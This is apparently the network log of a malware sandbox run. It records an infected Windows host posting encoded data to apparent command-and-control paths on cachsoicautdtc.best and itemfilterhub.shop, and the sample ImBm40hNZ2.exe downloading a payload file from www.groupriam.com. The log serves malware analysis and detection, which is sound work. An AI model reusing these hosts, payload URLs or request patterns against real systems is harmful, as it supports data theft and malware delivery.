                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.cachsoicautdtc.best
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 201
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.cachsoicautdtc.best/fp5q/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=sROdxZs/CdFUZLGRU7AT3IsYu+ftwVWulRWaFbGN3BkcMmG0209J/7yNW7FoXNBV6Q0mL9Wgdw+VL32eIMqH8Kr8Nee1XHY2Jmygl2YCOPJvczqrovqdDmZs5VamN18E99Q47UHDVrKDSMZI1UQXcPkrRtXjf+QBekDuqqjXFBbK+Ca269kREe0SLEAMIECE6A==
Timestamp: Oct 9, 2024 13:42:56.328573942 CEST, Bytes transferred: 1289, Direction: IN
HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:42:56 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Referrer-Policy: same-origin
                                                                                                                                                                                                                                                              Cache-Control: max-age=15
                                                                                                                                                                                                                                                              Expires: Wed, 09 Oct 2024 11:43:11 GMT
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4tYBeVB1BZDJXyUAnHlenNutWz6%2FB%2Bqywr44Mw4MxVCnfeoHptJoQhhRDTx2ued3i4xa1jPRbBtaAJnhZ4OhOZ2QZJIC9kebQqT85%2FkJf6ox7xa5q12UEoEZbx9UHeHmBO7KJh9YT%2B3vbQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe1c31af4c4358-EWR
                                                                                                                                                                                                                                                              Content-Encoding: gzip


Session ID: 55, Source IP: 192.168.11.20, Source Port: 49804, Destination IP: 172.67.191.241, Destination Port: 80
Timestamp: Oct 9, 2024 13:42:58.849598885 CEST, Bytes transferred: 852, Direction: OUT
POST /fp5q/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.cachsoicautdtc.best
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.cachsoicautdtc.best
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 221
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.cachsoicautdtc.best/fp5q/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=sROdxZs/CdFUYq2RXaATxosZwuft+1WqlRaaFfed3TwcMDi0319J67yNebFhKdBe6Q4AL9qgdwqVLz+eI8WE8arpUOe3J3Y2Jmygl1lnOPRvdC6rqL+ed2Zvp1amJ18I99Qa7VbpVpyDSNpI1G4UHfkheNWsafR4fHLckpH8EgTl20LsnPQ1HNogP05kKGDfnLBzjJQ1qkACGAGs3Xn7lwg=
Timestamp: Oct 9, 2024 13:42:58.958468914 CEST, Bytes transferred: 1289, Direction: IN
HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:42:58 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Referrer-Policy: same-origin
                                                                                                                                                                                                                                                              Cache-Control: max-age=15
                                                                                                                                                                                                                                                              Expires: Wed, 09 Oct 2024 11:43:13 GMT
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OB4sVnGlUHarp1LHVo5UOp6zl2Bi8YCcVI%2Fau3%2FrZPGbuRE8MyysLlOPEb%2FM5%2FHvaWtS15g%2FfFr4LxcLQnZGx782zVFvzbMpCOugJdEg%2FYaZ2aEtJzG2QsvdHM3K4DYc1%2F%2BJmIwBgIdtSg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe1c4218f66a59-EWR
                                                                                                                                                                                                                                                              Content-Encoding: gzip


Session ID: 56, Source IP: 192.168.11.20, Source Port: 49805, Destination IP: 172.67.191.241, Destination Port: 80
Timestamp: Oct 9, 2024 13:43:01.484154940 CEST, Bytes transferred: 2578, Direction: OUT
POST /fp5q/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.cachsoicautdtc.best
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.cachsoicautdtc.best
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 7369
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.cachsoicautdtc.best/fp5q/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:43:01.599069118 CEST | 1289 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:43:01 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Referrer-Policy: same-origin
                                                                                                                                                                                                                                                              Cache-Control: max-age=15
                                                                                                                                                                                                                                                              Expires: Wed, 09 Oct 2024 11:43:16 GMT
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qy8zvlpjrknXl5TIx%2FaUB1eqp5V%2B%2Bu6BUw%2FZGIxjUJpva3byG7H9v%2FkHaKTlhp9KyZEuEedWwhdclDRKsF8B9e8Ppw%2BUbuS3%2F4dEhP%2FHweB8SsyX4PBlu2XWIGpXHWzDSWmoZ7%2FVmLFADw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe1c52899632fa-EWR
                                                                                                                                                                                                                                                              Content-Encoding: gzip
Oct 9, 2024 13:43:01.599123001 CEST | 1184 | IN
Oct 9, 2024 13:43:01.599147081 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
57 | 192.168.11.20 | 49806 | 172.67.191.241 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:43:04.106813908 CEST | 556 | OUT | GET /fp5q/?9B6h=hTm9ypMPCvkZHpXOUIowtI5N2+z4niygtjCFVe/8mioZPRfz5TFJ3IewZaR+NPU03UUaFdubUQ2FIRqoOOixztWDEcr2XGgHHm20+kxsPtJkRiaVsamec0k=&FlS=3ldH5dkH-dBLf HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.cachsoicautdtc.best
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:43:04.213773966 CEST | 1289 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:43:04 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Referrer-Policy: same-origin
                                                                                                                                                                                                                                                              Cache-Control: max-age=15
                                                                                                                                                                                                                                                              Expires: Wed, 09 Oct 2024 11:43:19 GMT
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C3EcsDOe8LfYujcZ7b7XA9%2FHRmA6HkYKONCTgfG2sKuEpFT4gubH2Y%2B6JF57QmPKBaLrqTxADnq4tk9OSEDVzDYRBDK6WBItVE3O2rHxiNG96dBUAEn22fXVVqk4poOgJlW3LK38HX3%2BQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe1c62fb7a726f-EWR
                                                                                                                                                                                                                                                              Data Ascii: 11ab<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><me
Oct 9, 2024 13:43:04.213865995 CEST | 1289 | IN
                                                                                                                                                                                                                                                              Data Ascii: ta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.
Oct 9, 2024 13:43:04.213880062 CEST | 1289 | IN
                                                                                                                                                                                                                                                              Data Ascii: <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-colum
Oct 9, 2024 13:43:04.213892937 CEST | 1289 | IN
                                                                                                                                                                                                                                                              Data Ascii: lass="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8cfe1c62fb7a726f</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip"
Oct 9, 2024 13:43:04.213901043 CEST | 83 | IN
                                                                                                                                                                                                                                                              Data Ascii: --> <script> window._cf_translation = {}; </script></body></html>
Oct 9, 2024 13:43:04.213910103 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
58 | 192.168.11.20 | 49807 | 104.21.50.202 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:43:09.327955961 CEST | 829 | OUT | POST /p1v4/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.itemfilterhub.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.itemfilterhub.shop
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 201
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.itemfilterhub.shop/p1v4/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=aUfPfTh9K6lI4yXcCC6CFjl3yB+bL1qfMlYnJr7kl1MGvZo/Kz3bNsmk6lC3p/LtATiFs8MksKzXrwgVXaHP42EXNZmH4N/z1SUpRAuNeijugl7BXkydYWsJrFFzddT0BYzfK/GcSp6NrdfZsO1+Jgej/orOb2WD2/U1z0VjdSQNc2Exu89Fu/bYHeSX6xKdwA==
Oct 9, 2024 13:43:09.933917999 CEST | 731 | IN | HTTP/1.1 404
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:43:09 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p42idD7topIpz1%2F2WuAL2Jy%2BpAa4sSnANJpNEuga%2FZlfU0AiND8FX9fQ4wUNo4sIx3fjysOxF4UT%2BJoAb64ZBrLh3KZcmmrscSsKVtoERV1q%2F0vStCvpUoIWPDnDixOPD0cUW8rGWaBs"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe1c83995a7c82-EWR
                                                                                                                                                                                                                                                              Content-Encoding: gzip
Oct 9, 2024 13:43:09.933929920 CEST | 20 | IN | Data Raw: 61 0d 0a 03 00 96 12 38 3e a1 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: a8>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
59 | 192.168.11.20 | 49808 | 104.21.50.202 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:43:11.950274944 CEST | 849 | OUT | POST /p1v4/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.itemfilterhub.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.itemfilterhub.shop
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 221
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.itemfilterhub.shop/p1v4/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=aUfPfTh9K6lI4SHcAj6CHDl0+h+bBVqbMlEnJuX0lDcGs8M/Jy3bE8mkxFCy0vLiATu3s9wksJPXrxwVXpvM5mEVB5mJld/z1SUpRBLWeiruhVLBWGKebWsK/VFzLdT4BYyIK6v5Sv+NrfHZtf19QQelg4qxWXXnz9c+3mZKTHoXdgVrzOJhtsHqDur/4zLGtGQEpkRDDiVDDNo5kfEvues=
Oct 9, 2024 13:43:12.194515944 CEST | 737 | IN | HTTP/1.1 404
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:43:12 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GSaHBohponHT5UXBdSqMBYZLHu%2BZiE1%2FA0q6tWv1kOkk%2B9JycWFmZCx6G0M78ntfE11spqnQm3JBdqS4%2BCaz%2ByKkgwlZRdEJ%2F%2Bp2wciQ%2F4mw1ErWl996KBs6Bn4xx0LuoLObF0FFQzC2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe1c93fe7c5e66-EWR
                                                                                                                                                                                                                                                              Content-Encoding: gzip
Oct 9, 2024 13:43:12.194605112 CEST | 15 | IN | Data Raw: 61 0d 0a 03 00 96 12 38 3e a1 00 00 00 0d 0a
Data Ascii: a8>
Oct 9, 2024 13:43:12.194617033 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
60 | 192.168.11.20 | 49809 | 104.21.50.202 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:43:14.575975895 CEST | 2578 | OUT | POST /p1v4/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.itemfilterhub.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.itemfilterhub.shop
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 7369
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.itemfilterhub.shop/p1v4/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:43:14.575999022 CEST | 3867 | OUT
                                                                                                                                                                                                                                                              Data Ascii: 9WEz9CIt3cYFPtAxchZcfxi9S4u8JqY+kfe0x4Juw8TQOUHtYFQ0X5ErNgEqs7Z75p4ClBKqOLUSxq5XlISBwqe7APtpyqI9EkmvjsnME2yRVAtMH5YClhVPVkWtNLNaLR2M/yqU35wdYihPNmbHjuRR4l4o+RZ02EweIm+9W8CXvRgl6knhzO1V1o50iEumshQwtN/E+ftpOyQSXhmYwTV2XW1Qw9ZLJ5kWtrk1XEhgt+iFzVb
Oct 9, 2024 13:43:14.576071978 CEST | 1553 | OUT
                                                                                                                                                                                                                                                              Data Ascii: E7Gla3MepvFYzWzHHaSi2BQ5V0ossrMm7754tFpFXFofumMjzI8wLihqT99n1JqOE4bvRjnRRumBeUGh/FFsMQjhBrmIP0VXTGSBU5MbSjn0Cem3VOPw/5aaWpIGBd1IrqFB1zXuRbMnr6npMKRWF7KusEXZIIROZFT0kbIdvsfb8de/nkpRn+rNDd0qsAzRDT7pY6FV4xs25/INXsdK2fT9+aPP+clBHUoKZ2VLeozjSebJcjB
Oct 9, 2024 13:43:15.028693914 CEST | 739 | IN | HTTP/1.1 404
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:43:14 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xuogQ9Cz4XqUV8e%2BGiZ0xqIyI7Gvq1%2Fz38CZlIlTw%2F2QXRU7QHsVqtGoUezq1cfZ1jiPowzkJsNOrMXRcJitqRWJVj3GPxYZRibkzevT9K8GRcyD1MYis1B3eEG5J4BlBwMFMsJt%2B2Cd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe1ca46efa4213-EWR
                                                                                                                                                                                                                                                              Content-Encoding: gzip
Oct 9, 2024 13:43:15.028708935 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
61 | 192.168.11.20 | 49810 | 104.21.50.202 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:43:17.198030949 CEST | 555 | OUT | GET /p1v4/?FlS=3ldH5dkH-dBLf&9B6h=XW3vckNGBZMqkh6dDgKTVQdtxgWhQhuqI1UaXPyLgSYWv7ViPFn3HMqwy3qnuuGBWlC3pPEFi6D5pQsjZrraxjUjA6OulNf3kQwJOyuMay6JsEDMWEmFSkY= HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.itemfilterhub.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:43:17.776850939 CEST | 784 | IN | HTTP/1.1 404
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:43:17 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eAEl2Yi82zICcqd0LjBZQV9jodteUMXckMbjqFatA%2FVEHvr5IacdkVdr5w36D%2F%2BVeOBfm6kcokKGFp%2FSI4pADQo3xRPldXYkHgR37BW2xm3DkgF3LytgQqtz3BM%2FqqsVmXn37VG7Emmc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe1cb4c91b8c24-EWR
                                                                                                                                                                                                                                                              Data Raw: 61 31 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 35 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: a1<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.15.0</center></body></html>
Oct 9, 2024 13:43:17.777185917 CEST  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
0  192.168.11.20  49738  170.249.236.53  443  6456  C:\Users\user\Desktop\ImBm40hNZ2.exe
Timestamp  Bytes transferred  Direction  Data
2024-10-09 11:34:55 UTC  181  OUT  GET /sCvgayhFHxN196.bin HTTP/1.1
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                                                                                                                                                              Host: secretspark.com.bd
                                                                                                                                                                                                                                                              Cache-Control: no-cache
2024-10-09 11:34:55 UTC  535  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              link: <https://secretspark.com.bd/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                              x-litespeed-cache: hit
                                                                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:34:55 GMT
                                                                                                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1  192.168.11.20  49739  199.103.62.205  443  6456  C:\Users\user\Desktop\ImBm40hNZ2.exe
Timestamp  Bytes transferred  Direction  Data
2024-10-09 11:35:06 UTC  180  OUT  GET /sCvgayhFHxN196.bin HTTP/1.1
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                                                                                                                                                              Host: www.groupriam.com
                                                                                                                                                                                                                                                              Cache-Control: no-cache
2024-10-09 11:35:06 UTC  422  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              content-type: application/octet-stream
                                                                                                                                                                                                                                                              last-modified: Mon, 23 Sep 2024 16:31:11 GMT
                                                                                                                                                                                                                                                              accept-ranges: bytes
                                                                                                                                                                                                                                                              content-length: 336448
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:35:06 GMT
                                                                                                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                                                                                                              vary: User-Agent
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
